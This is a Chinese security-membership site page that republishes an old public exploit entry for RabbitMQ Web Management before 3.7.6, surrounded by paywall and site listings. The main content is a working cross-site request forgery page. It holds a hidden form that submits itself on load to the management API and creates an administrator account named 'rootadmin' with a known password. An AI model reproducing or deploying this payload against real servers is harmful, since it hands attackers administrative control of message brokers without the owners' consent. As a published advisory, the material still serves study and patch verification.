44902_RABBITMQ Web Management 3.7.6-跨站点请求伪造(添加管理员)-Linux WebApps exploit.txt

0425
# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
# Date: 2018-06-17
# Author: Dolev Farhi
# Vendor or Software Link: www.rabbitmq.com
# Version: 3.7.6
# Tested on: Ubuntu

<html>  
<h2>Add RabbitMQ Admin</h2>

<body>
<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
<input type="hidden" name="username" value="rootadmin" />
<input type="hidden" name="password" value="rootadmin" />
<input type="hidden" name="tags" value="administrator" />
<input type="submit"  value="save" />
</form>

<script>
  window.onload = rabbit.submit()
</script>

</body>
</html>

 

44902_RABBITMQ Web Management 3.7.6-跨站点请求伪造(添加管理员)-Linux WebApps exploit.txt-棉花糖会员站
44902_RABBITMQ Web Management 3.7.6-跨站点请求伪造(添加管理员)-Linux WebApps exploit.txt
此内容为付费阅读,请付费后查看
9999积分
付费阅读
已售 8
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国外漏洞库
# 跨站点请求伪造添加管理员
喜欢就支持一下吧
点赞5 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20241201版本)-棉花糖会员站
会员必看手册(20241201版本)
会员必看手册(20241201版本)
9月20日 1.9W+
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
11月17日 4113
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
3月25日 3965
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
9月29日 3093
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
6月8日 2545
上心-SRC培训课-棉花糖会员站
上心-SRC培训课
上心-SRC培训课
5月7日 2490
相关推荐
Zimbra远程命令执行(CVE-2024-45519)-棉花糖会员站
Zimbra远程命令执行(CVE-2024-45519)
Zimbra远程命令执行(CVE-2024-45519)
10月11日 753
pgAdmin4 反序列化漏洞(CVE-2024-2044).docx-棉花糖会员站
pgAdmin4 反序列化漏洞(CVE-2024-2044).docx
pgAdmin4 反序列化漏洞(CVE-2024-2044).docx
10月11日 546
CVE-2024-38819 Spring 框架任意文件读取-棉花糖会员站
CVE-2024-38819 Spring 框架任意文件读取
CVE-2024-38819 Spring 框架任意文件读取
12月16日 520
pgAdmin4敏感信息泄露(CVE-2024-9014)-棉花糖会员站
pgAdmin4敏感信息泄露(CVE-2024-9014)
pgAdmin4敏感信息泄露(CVE-2024-9014)
10月11日 474
Fortinet FortiManager 身份认证绕过 (CVE-2024-47575)-棉花糖会员站
Fortinet FortiManager 身份认证绕过 (CVE-2024-47575)
Fortinet FortiManager 身份认证绕过 (CVE-2024-47575)
11月19日 373
Ivanti Pulse Connect Secure VPN XXE漏洞(CVE-2024-22024)-棉花糖会员站
Ivanti Pulse Connect Secure VPN XXE漏洞(CVE-2024-22024)
Ivanti Pulse Connect Secure VPN XXE漏洞(CVE-2024-22024)
10月11日 276
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
Zeroshell 远程命令执行(CVE-2020-29390)
【必看】年终抽奖礼物事宜细则(彩蛋版)
蓝凌EKP系统fsscCommonPortlet.do 未授权SQL注入
福建科立讯通信有限公司指挥调度send_fax.php 命令执行
杭州平治科技一卡通系统 AddPkFreePartyMFCar SQL注入
朗速ERP FileUploadApi.ashx 任意文件上传致RCE
付费阅读
9999积分
已售 8
最近一周热门文章

1【投稿】面向脚本小子的卡巴斯基免杀-老鑫安全

1inc50的头像-棉花糖会员站年费会员1月23日
年费会员会员专属858

2感谢糖主 Electron+React+七牛云实战跨平台桌面应用

麦芽糖的头像-棉花糖会员站年费会员1月28日
410

3某公众号的纯垃圾SRC知识库(他妈的又被割了)

1inc50的头像-棉花糖会员站年费会员1月30日
年费会员会员专属408

4小迪渗透吧

kerjo的头像-棉花糖会员站年费会员1月24日
343

5Python爬虫开发+APP逆向超级大神班(1-10期)

kerjo的头像-棉花糖会员站年费会员1月24日
284

6【SQL注入】Sqlmap使用指南(手把手保姆版)

pluto的头像-棉花糖会员站年费会员1月24日
257
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密